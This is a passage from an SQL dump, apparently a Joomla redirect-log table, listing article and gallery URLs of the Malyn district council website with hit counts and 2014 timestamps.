00:00:00',301),(1874,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-18 00:46:13','0000-00-00 00:00:00',301),(1875,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-18 00:47:11','0000-00-00 00:00:00',301),(1876,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:-l-r&catid=57:--15042014-&Itemid=98&lang=en','','','',7,0,'2014-09-18 00:48:03','0000-00-00 00:00:00',301),(1877,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1271:2014-04-09-05-14-20&catid=10&Itemid=17&lang=en','','','',4,0,'2014-09-18 00:48:06','0000-00-00 00:00:00',301),(1878,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=885:-2013-2015-&catid=46&Itemid=85&lang=ru','','','',5,0,'2014-09-18 00:51:04','0000-00-00 00:00:00',301),(1879,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-09-18 00:53:22','0000-00-00 00:00:00',301),(1880,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=49&Itemid=88&lang=ru','','','',4,0,'2014-09-18 00:54:42','0000-00-00 00:00:00',301),(1881,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=ru','','','',6,0,'2014-09-18 00:55:12','0000-00-00 00:00:00',301),(1882,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&Itemid=32&lang=uk','','','',11,0,'2014-09-18 00:57:42','0000-00-00 00:00:00',301),(1883,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=854:2012-12-11-13-40-55&catid=32:2011-03-31-12-03-04&Itemid=64&lang=uk','','','',17,0,'2014-09-18 00:58:32','0000-00-00 00:00:00',301),(1884,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=57&Itemid=98&lang=en','','','',7,0,'2014-09-18 01:00:58','0000-00-00 00:00:00',301),(1885,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-18 01:01:22','0000-00-00 00:00:00',301),(1886,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-18 01:02:01','0000-00-00 00:00:00',301),(1887,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1304:2014-04-30-09-11-23&catid=58:--30042014-&Itemid=105&lang=uk','','','',11,0,'2014-09-18 01:03:47','0000-00-00 00:00:00',301),(1888,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:---------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',6,0,'2014-09-18 01:04:31','0000-00-00 00:00:00',301),(1889,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',16,0,'2014-09-18 01:08:28','0000-00-00 00:00:00',301),(1890,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-18 01:09:19','0000-00-00 00:00:00',301),(1891,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=en&Itemid=','','','',6,0,'2014-09-18 01:09:21','0000-00-00 00:00:00',301),(1892,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',14,0,'2014-09-18 01:09:58','0000-00-00 00:00:00',301),(1893,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-18 01:10:02','0000-00-00 00:00:00',301),(1894,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-18 01:10:27','0000-00-00 00:00:00',301),(1895,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=en','','','',4,0,'2014-09-18 01:11:58','0000-00-00 00:00:00',301),(1896,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15&lang=en&Itemid=','','','',1,0,'2014-09-18 01:11:59','0000-00-00 00:00:00',301),(1897,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1016:2013-06-03-11-41-36&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-18 01:14:34','0000-00-00 00:00:00',301),(1898,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=en&Itemid=','','','',8,0,'2014-09-18 01:17:02','0000-00-00 00:00:00',301),(1899,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47&Itemid=86&lang=en','','','',5,0,'2014-09-18 01:20:24','0000-00-00 00:00:00',301),(1900,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',10,0,'2014-09-18 01:21:02','0000-00-00 00:00:00',301),(1901,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=uk','','','',8,0,'2014-09-18 01:22:59','0000-00-00 00:00:00',301),(1902,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-18 01:23:07','0000-00-00 00:00:00',301),(1903,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1014:2013-06-03-06-43-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-18 01:25:16','0000-00-00 00:00:00',301),(1904,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=881:2012-12-21-17-06-15&catid=46:--21122012&Itemid=85&lang=en','','','',3,0,'2014-09-18 01:26:09','0000-00-00 00:00:00',301),(1905,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-18 01:27:35','0000-00-00 00:00:00',301),(1906,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',11,0,'2014-09-18 01:28:21','0000-00-00 00:00:00',301),(1907,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&catid=51:--19072013-&Itemid=92&lang=en','','','',9,0,'2014-09-18 01:30:18','0000-00-00 00:00:00',301),(1908,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&catid=52:--16082013-&Itemid=93&lang=en','','','',25,0,'2014-09-18 01:32:53','0000-00-00 00:00:00',301),(1909,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=319:-2009-2011-&catid=33&Itemid=66&lang=ru','','','',14,0,'2014-09-18 01:33:31','0000-00-00 00:00:00',301),(1910,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=uk','','','',7,0,'2014-09-18 01:33:36','0000-00-00 00:00:00',301),(1911,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&catid=46&Itemid=85&lang=en','','','',7,0,'2014-09-18 01:33:50','0000-00-00 00:00:00',301),(1912,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-18 01:35:32','0000-00-00 00:00:00',301),(1913,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=uk','','','',6,0,'2014-09-18 01:35:34','0000-00-00 00:00:00',301),(1914,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=51&Itemid=92&lang=en','','','',5,0,'2014-09-18 01:36:02','0000-00-00 00:00:00',301),(1915,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=ru','','','',3,0,'2014-09-18 01:36:43','0000-00-00 00:00:00',301),(1916,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=49:--12042013-&Itemid=88&lang=ru','','','',4,0,'2014-09-18 01:38:34','0000-00-00 00:00:00',301),(1917,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',19,0,'2014-09-18 01:39:28','0000-00-00 00:00:00',301),(1918,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-18 01:39:31','0000-00-00 00:00:00',301),(1919,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-18 01:39:41','0000-00-00 00:00:00',301),(1920,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=en&Itemid=','','','',8,0,'2014-09-18 01:40:09','0000-00-00 00:00:00',301),(1921,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:--24--6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-18 01:41:04','0000-00-00 00:00:00',301),(1922,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',13,0,'2014-09-18 01:41:20','0000-00-00 00:00:00',301),(1923,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=994:2013-04-23-08-30-51&catid=50:--23042013-&Itemid=90&lang=ru','','','',13,0,'2014-09-18 01:41:48','0000-00-00 00:00:00',301),(1924,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-18 01:41:55','0000-00-00 00:00:00',301),(1925,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=uk&Itemid=','','','',6,0,'2014-09-18 01:41:57','0000-00-00 00:00:00',301),(1926,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-18 01:42:43','0000-00-00 00:00:00',301),(1927,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2014-09-18 01:42:47','0000-00-00 00:00:00',301),(1928,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-18 01:42:49','0000-00-00 00:00:00',301),(1929,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=49&Itemid=88&lang=en','','','',6,0,'2014-09-18 01:42:52','0000-00-00 00:00:00',301),(1930,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&Itemid=14&lang=ru','','','',10,0,'2014-09-18 01:43:02','0000-00-00 00:00:00',301),(1931,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=51&Itemid=92&lang=en','','','',8,0,'2014-09-18 01:44:16','0000-00-00 00:00:00',301),(1932,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11&lang=uk','','','',3,0,'2014-09-18 01:44:44','0000-00-00 00:00:00',301),(1933,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=uk&Itemid=','','','',10,0,'2014-09-18 01:45:02','0000-00-00 00:00:00',301),(1934,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',14,0,'2014-09-18 01:45:20','0000-00-00 00:00:00',301),(1935,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-18 01:46:10','0000-00-00 00:00:00',301),(1936,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=38:--19122011-&Itemid=73&lang=uk','','','',17,0,'2014-09-18 01:46:20','0000-00-00 00:00:00',301),(1937,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&lang=uk','','','',5,0,'2014-09-18 01:47:07','0000-00-00 00:00:00',301),(1938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',13,0,'2014-09-18 01:47:27','0000-00-00 00:00:00',301),(1939,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-18 01:47:46','0000-00-00 00:00:00',301),(1940,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=47&Itemid=86&lang=uk','','','',6,0,'2014-09-18 01:48:21','0000-00-00 00:00:00',301),(1941,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=47:-21022013-&Itemid=86&lang=en','','','',7,0,'2014-09-18 01:48:37','0000-00-00 00:00:00',301),(1942,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=51&Itemid=92&lang=uk','','','',5,0,'2014-09-18 01:48:39','0000-00-00 00:00:00',301),(1943,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1348:2014-06-20-13-13-51&catid=59:--20062014-&Itemid=107&lang=en','','','',7,0,'2014-09-18 01:48:42','0000-00-00 00:00:00',301),(1944,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',7,0,'2014-09-18 01:48:57','0000-00-00 00:00:00',301),(1945,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=uk','','','',9,0,'2014-09-18 01:48:59','0000-00-00 00:00:00',301),(1946,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1255:2014-03-27-06-02-11&catid=10&Itemid=17&lang=en','','','',10,0,'2014-09-18 01:49:16','0000-00-00 00:00:00',301),(1947,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=en&Itemid=','','','',6,0,'2014-09-18 01:49:22','0000-00-00 00:00:00',301),(1948,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&lang=uk&Itemid=','','','',6,0,'2014-09-18 01:50:01','0000-00-00 00:00:00',301),(1949,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-18 01:50:25','0000-00-00 00:00:00',301),(1950,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-18 01:50:27','0000-00-00 00:00:00',301),(1951,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&Itemid=14&lang=en','','','',2,0,'2014-09-18 01:52:49','0000-00-00 00:00:00',301),(1952,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=57&Itemid=98&lang=en','','','',3,0,'2014-09-18 01:55:32','0000-00-00 00:00:00',301),(1953,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',4,0,'2014-09-18 01:56:55','0000-00-00 00:00:00',301),(1954,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-18 01:57:00','0000-00-00 00:00:00',301),(1955,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',93,0,'2014-09-18 01:57:45','0000-00-00 00:00:00',301),(1956,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1051:--------4------&catid=51&Itemid=92&lang=en','','','',7,0,'2014-09-18 01:58:15','0000-00-00 00:00:00',301),(1957,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=49:--12042013-&Itemid=88&lang=en','','','',5,0,'2014-09-18 01:58:32','0000-00-00 00:00:00',301),(1958,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=uk','','','',6,0,'2014-09-18 02:00:33','0000-00-00 00:00:00',301),(1959,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=en&Itemid=','','','',7,0,'2014-09-18 02:01:10','0000-00-00 00:00:00',301),(1960,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-----l---r--------------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-09-18 02:01:18','0000-00-00 00:00:00',301),(1961,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&Itemid=14&lang=ru','','','',9,0,'2014-09-18 02:02:10','0000-00-00 00:00:00',301),(1962,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=49&Itemid=88&lang=en','','','',12,0,'2014-09-18 02:02:53','0000-00-00 00:00:00',301),(1963,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=ru&Itemid=','','','',11,0,'2014-09-18 02:02:55','0000-00-00 00:00:00',301),(1964,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=926:2013-02-21-09-02-30&catid=47&Itemid=86&lang=en','','','',11,0,'2014-09-18 02:06:01','0000-00-00 00:00:00',301),(1965,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=ru&Itemid=','','','',8,0,'2014-09-18 02:06:06','0000-00-00 00:00:00',301),(1966,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',15,0,'2014-09-18 02:06:36','0000-00-00 00:00:00',301),(1967,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=uk','','','',7,0,'2014-09-18 02:06:38','0000-00-00 00:00:00',301),(1968,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=uk','','','',4,0,'2014-09-18 02:07:59','0000-00-00 00:00:00',301),(1969,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:-2010-2015-&catid=49&Itemid=88&lang=en','','','',8,0,'2014-09-18 02:08:05','0000-00-00 00:00:00',301),(1970,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1287:2014-04-23-06-49-34&catid=10&Itemid=17&lang=uk','','','',9,0,'2014-09-18 02:09:26','0000-00-00 00:00:00',301),(1971,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&Itemid=14&lang=en','','','',17,0,'2014-09-18 02:10:16','0000-00-00 00:00:00',301),(1972,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=49:--12042013-&Itemid=88&lang=ru','','','',4,0,'2014-09-18 02:10:18','0000-00-00 00:00:00',301),(1973,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=893:-2013-2014-&catid=47&Itemid=86&lang=ru','','','',9,0,'2014-09-18 02:12:12','0000-00-00 00:00:00',301),(1974,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-18 02:13:30','0000-00-00 00:00:00',301),(1975,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-18 02:14:01','0000-00-00 00:00:00',301),(1976,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-18 02:14:03','0000-00-00 00:00:00',301),(1977,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-18 02:14:07','0000-00-00 00:00:00',301),(1978,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&lang=uk','','','',7,0,'2014-09-18 02:15:04','0000-00-00 00:00:00',301),(1979,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=27:2010-06-07-11-05-24&catid=21:2010-06-07-09-43-24&Itemid=47&lang=uk','','','',14,0,'2014-09-18 02:15:06','0000-00-00 00:00:00',301),(1980,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-18 02:16:04','0000-00-00 00:00:00',301),(1981,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11&lang=en','','','',5,0,'2014-09-18 02:20:43','0000-00-00 00:00:00',301),(1982,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-----lr--2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-09-18 02:25:11','0000-00-00 00:00:00',301),(1983,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-18 02:26:29','0000-00-00 00:00:00',301),(1984,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-18 02:28:52','0000-00-00 00:00:00',301),(1985,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=32&lang=en','','','',15,0,'2014-09-18 02:31:49','0000-00-00 00:00:00',301),(1986,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=38:--19122011-&Itemid=73&lang=en','','','',12,0,'2014-09-18 02:37:51','0000-00-00 00:00:00',301),(1987,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=en','','','',4,0,'2014-09-18 02:53:18','0000-00-00 00:00:00',301),(1988,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=54:--29112013-&Itemid=95&lang=en','','','',14,0,'2014-09-18 02:59:32','0000-00-00 00:00:00',301),(1989,'http://www.malyn-rayrada.org.ua/images/stories/food.php','','','',31,0,'2014-09-18 03:09:11','0000-00-00 00:00:00',301),(1990,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-2013-i-2014-&catid=56&Itemid=97&lang=ru','','','',16,0,'2014-09-18 03:21:41','0000-00-00 00:00:00',301),(1991,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-18 03:24:23','0000-00-00 00:00:00',301),(1992,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=uk','','','',5,0,'2014-09-18 03:27:09','0000-00-00 00:00:00',301),(1993,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-18 03:29:19','0000-00-00 00:00:00',301),(1994,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=49&Itemid=88&lang=en','','','',10,0,'2014-09-18 03:30:32','0000-00-00 00:00:00',301),(1995,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=en','','','',8,0,'2014-09-18 03:32:50','0000-00-00 00:00:00',301),(1996,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&catid=49&Itemid=88&lang=en','','','',5,0,'2014-09-18 03:38:18','0000-00-00 00:00:00',301),(1997,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-18 03:41:01','0000-00-00 00:00:00',301),(1998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',17,0,'2014-09-18 03:54:47','0000-00-00 00:00:00',301),(1999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47:-21022013-&Itemid=86&lang=uk','','','',9,0,'2014-09-18 04:04:28','0000-00-00 00:00:00',301),(2000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-18 04:10:16','0000-00-00 00:00:00',301),(2001,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-09-18 04:27:24','0000-00-00 00:00:00',301),(2002,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-18 04:28:00','0000-00-00 00:00:00',301),(2003,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-18 04:29:41','0000-00-00 00:00:00',301),(2004,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=49&Itemid=88&lang=ru','','','',8,0,'2014-09-18 04:31:10','0000-00-00 00:00:00',301),(2005,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-18 04:32:29','0000-00-00 00:00:00',301),(2006,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',19,0,'2014-09-18 04:35:09','0000-00-00 00:00:00',301),(2007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=en&Itemid=','','','',8,0,'2014-09-18 04:35:17','0000-00-00 00:00:00',301),(2008,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11&lang=ru&Itemid=','','','',5,0,'2014-09-18 04:36:33','0000-00-00 00:00:00',301),(2009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-18 04:37:52','0000-00-00 00:00:00',301),(2010,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-18 04:37:56','0000-00-00 